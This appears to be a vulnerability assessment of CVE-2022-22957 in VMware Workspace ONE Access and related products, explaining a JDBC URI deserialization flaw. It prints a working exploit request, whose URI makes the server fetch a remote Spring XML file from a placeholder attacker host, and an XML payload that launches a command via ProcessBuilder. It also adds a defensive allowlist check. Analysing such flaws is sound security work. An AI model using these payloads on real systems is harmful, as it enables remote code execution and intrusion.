CVE-2022-22957
Description
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two remote code execution vulnerabilities (CVE-2022-22957 & CVE-2022-22958). A malicious actor with administrative access can trigger deserialization of untrusted data through malicious JDBC URI which may result in remote code execution.
Ratings
- Attacker Value: High
- Exploitability: Very High
Technical Analysis
This is an authenticated remote code execution vulnerability which gives access in the context of the `horizon` user; however, authentication can easily be bypassed with CVE-2022-22956. The list of affected products and corresponding versions is:
| Vulnerable Application | Vulnerable version |
|---|---|
| VMware Workspace ONE Access (Access) | 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 |
| VMware Identity Manager (vIDM) | 3.3.6, 3.3.5, 3.3.4, 3.3.3 |
| VMware vRealize Automation (vRA) | 8.x, 7.6 |
| VMware Cloud Foundation | 4.x |
Reason for Exploitability & Attacker Value rating.
As mentioned in my write-up for CVE-2022-22956, this vulnerability was bundled up in VMSA-2022-0011 along with 8 other CVEs. Out of all the CVEs in this advisory, CVE-2022-22954 really stole the show as it was an unauth RCE. Not as many paid much mind to this CVE + CVE-2022-22956 (authentication bypass), which when combined with CVE-2022-22960 (LPE) gives attackers yet another exploitation path to unauthenticated RCE as root.
How it works
This vulnerability abuses the `dbCheck` method inside the `com.vmware.horizon.rest.controller.system.DBConnectionCheckController` class. The method accepts an attacker controlled parameter `jdbcUrl` which gets passed through a string of method calls until it eventually reaches a `DriverManager.getConnection` sink, which will lead to an arbitrary JDBC URI connection.

Remote code execution can be achieved through the `socketFactory` property of the PostgreSQL JDBC driver. An attacker can set the `socketFactory` and `socketFactoryArg` properties in order to trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Due to the fact VMware Workspace One uses Spring with a PostgreSQL database, `FileSystemXmlApplicationContext` can be used.
The attacker sends a `POST` request to the following URI: `/SAAS/API/1.0/REST/system/dbCheck` with the following data:

```
jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{attacker-ip-address}:#{attacker-port-hosting-malicious-file}/#(unknown)
```

While hosting the following file:

```xml
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>touch</value>
        <value>/tmp/rce</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```
The above file will be downloaded by the victim and the command inside the `constructor-arg` will be executed in the context of the `horizon` user.
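A defensive counterpart to the sink described in the assessment above, added here as an example and not code from the assessment or from VMware: an allowlist check that a server-side handler could apply to a caller-supplied `jdbcUrl` before it ever reaches `DriverManager.getConnection`. The permitted driver, hosts and property names are assumptions for illustration, and the sample URLs are constructed.

```python
from typing import Optional
from urllib.parse import urlsplit, parse_qsl

# Assumed allowlists for illustration: the only driver, hosts and connection
# properties a database connectivity check should be allowed to select.
ALLOWED_SUBPROTOCOL = "postgresql"
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}
ALLOWED_PROPERTIES = {"user", "password", "ssl", "sslmode", "connecttimeout"}


def parse_jdbc_url(jdbc_url: str) -> dict:
    """Split 'jdbc:<subprotocol>://host[:port]/db?k=v&...' into its parts."""
    if not jdbc_url.startswith("jdbc:"):
        raise ValueError("not a JDBC URL")
    subprotocol, sep, rest = jdbc_url[len("jdbc:"):].partition(":")
    if not sep or not rest.startswith("//"):
        raise ValueError("unsupported JDBC URL form")
    parts = urlsplit(rest)  # rest looks like //host:port/db?query
    return {
        "subprotocol": subprotocol,
        "host": parts.hostname,
        "port": parts.port,
        "database": parts.path.lstrip("/"),
        # keep_blank_values so 'socketFactoryArg=' is still seen as a property
        "properties": dict(parse_qsl(parts.query, keep_blank_values=True)),
    }


def check_jdbc_url(jdbc_url: str) -> Optional[str]:
    """Return None if the URL passes the allowlist, else the reason it fails."""
    try:
        parsed = parse_jdbc_url(jdbc_url)
    except ValueError as exc:
        return str(exc)
    if parsed["subprotocol"] != ALLOWED_SUBPROTOCOL:
        return f"driver not allowed: {parsed['subprotocol']}"
    if parsed["host"] not in ALLOWED_HOSTS:
        return f"host not allowed: {parsed['host']}"
    # socketFactory / socketFactoryArg fail simply by not being allowlisted;
    # names are compared case-insensitively so no variant spelling slips by.
    for name in parsed["properties"]:
        if name.lower() not in ALLOWED_PROPERTIES:
            return f"property not allowed: {name}"
    return None


if __name__ == "__main__":
    # Constructed sample in the shape of the payload discussed above.
    sample = ("jdbc:postgresql://localhost:1337/saas?socketFactory="
              "org.springframework.context.support.FileSystemXmlApplicationContext"
              "&socketFactoryArg=http://203.0.113.5:8000/poc.xml")
    print(check_jdbc_url(sample))  # property not allowed: socketFactory
```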
General Information
Vendors
- vmware
Products
- cloud foundation
- identity manager 3.3.3
- identity manager 3.3.4
- identity manager 3.3.5
- identity manager 3.3.6
- vrealize automation
- vrealize automation 7.6
- vrealize suite lifecycle manager
- workspace one access 20.10.0.0
- workspace one access 20.10.0.1
- workspace one access 21.08.0.0
- workspace one access 21.08.0.1